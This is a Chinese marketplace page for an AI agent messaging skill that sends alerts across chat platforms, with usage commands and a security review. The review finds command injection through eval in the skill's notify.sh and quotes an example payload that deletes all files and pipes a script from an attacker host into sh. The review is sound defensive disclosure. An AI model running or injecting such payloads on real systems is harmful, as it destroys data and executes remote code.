← 返回 Skills 市场
99
总下载
0
收藏
0
当前安装
1
版本数
在 OpenClaw 中安装
/install cross-platform-messenger-claw
功能描述
跨渠道消息推送与联络协调。核心职责:打通各类通讯工具与邮件的接口,确保预警和报告能精准推送到目标人员。业务价值:信息直达——让每一条重要消息都能触达对的人、对的设备。激活场景:用户要求发送消息到某个通讯平台(飞书、WhatsApp、Telegram、Discord、Slack、Signal、iMessage、Li...
使用说明 (SKILL.md)
跨平台消息联络虾
核心能力
通过 OpenClaw CLI openclaw message 命令,向 20+ 通讯渠道发送文本消息和媒体附件。
单条推送
openclaw message send --channel \x3C渠道> --target \x3C目标> --message "\x3C消息>"
带附件:
openclaw message send --channel \x3C渠道> --target \x3C目标> --message "\x3C消息>" --media \x3C路径或URL>
广播/群发
openclaw message broadcast --channel \x3C渠道> --targets \x3C目标1> \x3C目标2> ... --message "\x3C消息>"
或使用 scripts/notify.sh 从文件批量推送:
./scripts/notify.sh --channel \x3C渠道> --message "\x3C消息>" \x3C targets.txt
渠道参考
各渠道的 --channel 值和 --target 格式见 references/channels.md。
最常用渠道速查:
| 场景 | 命令 |
|---|---|
| 飞书用户 | --channel feishu --target ou_xxx |
| 飞书群 | --channel feishu --target oc_xxx |
--channel whatsapp --target +86138xxxx |
|
| Telegram | --channel telegram --target @username |
| Discord 频道 | --channel discord --target channel:\x3Cid> |
| Slack 频道 | --channel slack --target #channel_name |
工作流程
即时推送
- 确认渠道和目标(who + where)
- 确认消息内容和格式(文本/附件/卡片)
- 用
openclaw message send执行 - 反馈发送结果
定时推送(cron + notify.sh)
- 确认推送频率、时间、内容模板
- 编写推送脚本或使用
scripts/notify.sh - 通过
openclaw cron设置定时任务 - 验证首次执行结果
条件推送(预警场景)
- 确认触发条件(阈值、事件等)
- 确认推送目标和消息模板
- 编写检测脚本(可用
scripts/notify.sh发送结果) - 通过 cron 或 heartbeat 实现定期检查
消息格式建议
- 飞书/Discord/Slack:支持 Markdown,善用格式化
- WhatsApp:纯文本为主,避免 Markdown 特殊字符
- Telegram:支持部分 Markdown,可用按钮交互
- 跨渠道通用:优先使用纯文本 + Emoji,确保兼容性
- 重要通知:建议多渠道冗余推送
注意事项
- 各渠道有频率限制,群发时注意间隔
- 媒体文件建议 \x3C 30MB
--dry-run可用于测试而不实际发送- 发送失败时检查目标格式和渠道配置
安全使用建议
这是一个与描述相符的“跨渠道推送”脚本包,但有实质性安全注意事项:
- 主要风险:scripts/notify.sh 使用 eval 在 shell 中执行由参数拼接出的命令字符串,会导致命令注入。如果消息内容或目标来自不受信任的输入(例如用户输入的文本或外部文件),攻击者可注入并执行任意命令。示例危险输入:"; rm -rf / # 或 $(curl http://attacker/x|sh)"。
- 建议在安装/运行前采取以下措施:
1) 不要在自动化环境中直接传入未消毒的外部数据到 --message/targets。先用白名单或转义限制目标格式(例如严格验证电话号码/ID 格式)。
2) 将脚本修复为不使用 eval:在构建命令时保持为 bash 数组并以 "${cmd[@]}" 执行,或直接调用 openclaw 命令而不是构造并 eval 字符串。举例:
- 避免: cmd=$(build_cmd "$target") && eval "$cmd"
- 更好: 在 send_one 中直接构造数组 cmd=(openclaw message send --channel ... ) 然后执行 "${cmd[@]}"。
3) 使用 --dry-run 先验证要发送的参数输出;在批量/cron 场景下先在安全环境中测试。
4) 明确凭据来源:确认 OpenClaw CLI 已正确且安全地配置各渠道的 API keys/tokens,且这些凭据存放位置和访问权限符合最小权限原则。
- 如果你是维护者:在 README/SKILL.md 中补充对凭据配置的说明,修复脚本以消除 eval,并添加输入验证与日志/失败处理。
基于以上不安全的执行方式和文档不完整性,我建议在修复脚本(去掉 eval、增加输入验证)并补充凭据配置说明前,将该技能视为有风险并谨慎部署。
功能分析
Type: OpenClaw Skill
Name: cross-platform-messenger-claw
Version: 1.0.0
The skill provides legitimate cross-platform messaging functionality but contains a shell injection vulnerability in 'scripts/notify.sh'. The script uses 'eval' to execute a command string constructed from unsanitized inputs ($CHANNEL, $TARGET, $MESSAGE, $MEDIA), which could allow an attacker to execute arbitrary shell commands if they can influence the message content or target list. While no clear evidence of malicious intent was found, the use of 'eval' on external input is a high-risk coding practice.
能力评估
Purpose & Capability
Skill 名称与描述(跨渠道消息推送)与 SKILL.md 和 scripts/notify.sh 的功能一致:都用 openclaw CLI 发送消息到多个渠道。没有声明额外的环境变量或凭据,可能是因为依赖于本地已配置的 OpenClaw CLI 凭据;这种依赖是合理但未明确说明,应当在文档里说明如何配置渠道 API token/credentials(飞书/WhatsApp/Slack 等)和 openclaw CLI 的先决条件。
Instruction Scope
SKILL.md 与脚本的运行边界主要局限于调用本地 openclaw CLI 并从 stdin 或参数读取目标与消息,但脚本在 send_one 中通过 eval 执行构造的命令字符串(eval "$cmd")。这会导致命令注入风险:如果 message 或 target 包含恶意字符(如分号、反引号、$()、`),攻击者或不受信任的输入可执行任意 shell 命令。此外脚本未对输入进行消毒或适当引用,且使用 eval 还会引起参数拆分/转义问题。SKILL.md 也鼓励把脚本放入 cron 或作为自动化检测脚本的一部分,结合不安全的执行方式会扩大风险面。
Install Mechanism
无安装规范(instruction-only + 一个脚本),没有下载外部二进制或写入磁盘的安装步骤,攻击面较小。脚本会被写入包内,但不会自动从不可信地址获取代码。
Credentials
声明无需任何环境变量或凭据,但要实际发送到各渠道通常需要 API keys/credentials(由 OpenClaw CLI 管理)。不列出任何凭据本身不是错误,但文档应明确说明:OpenClaw CLI 要如何配置渠道凭据、凭据存放位置(配置文件/环境变量)以及权限建议。当前缺少这些说明会让安装者误以为无需凭据而造成误配置或凭据滥用。
Persistence & Privilege
flags 显示 always:false,技能不会强制驻留或改变其它技能配置;默认允许模型调用(正常),脚本本身也不要求改变平台持久设置。
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install cross-platform-messenger-claw - 安装完成后,直接呼叫该 Skill 的名称或使用
/cross-platform-messenger-claw触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.0.0
初始发布:支持 20+ 通讯渠道统一消息推送,含即时推送、定时广播、条件预警三种模式,内置 notify.sh 批量推送脚本和完整渠道配置参考
元数据
常见问题
Cross Platform Messenger Claw 是什么?
跨渠道消息推送与联络协调。核心职责:打通各类通讯工具与邮件的接口,确保预警和报告能精准推送到目标人员。业务价值:信息直达——让每一条重要消息都能触达对的人、对的设备。激活场景:用户要求发送消息到某个通讯平台(飞书、WhatsApp、Telegram、Discord、Slack、Signal、iMessage、Li... 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 99 次。
如何安装 Cross Platform Messenger Claw?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install cross-platform-messenger-claw」即可一键安装,无需额外配置。
Cross Platform Messenger Claw 是免费的吗?
是的,Cross Platform Messenger Claw 完全免费,采用 MIT-0 许可证,可自由下载、安装和使用。
Cross Platform Messenger Claw 支持哪些平台?
Cross Platform Messenger Claw 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。
谁开发了 Cross Platform Messenger Claw?
由 Ricky(@tujinsama)开发并维护,当前版本 v1.0.0。
推荐 Skills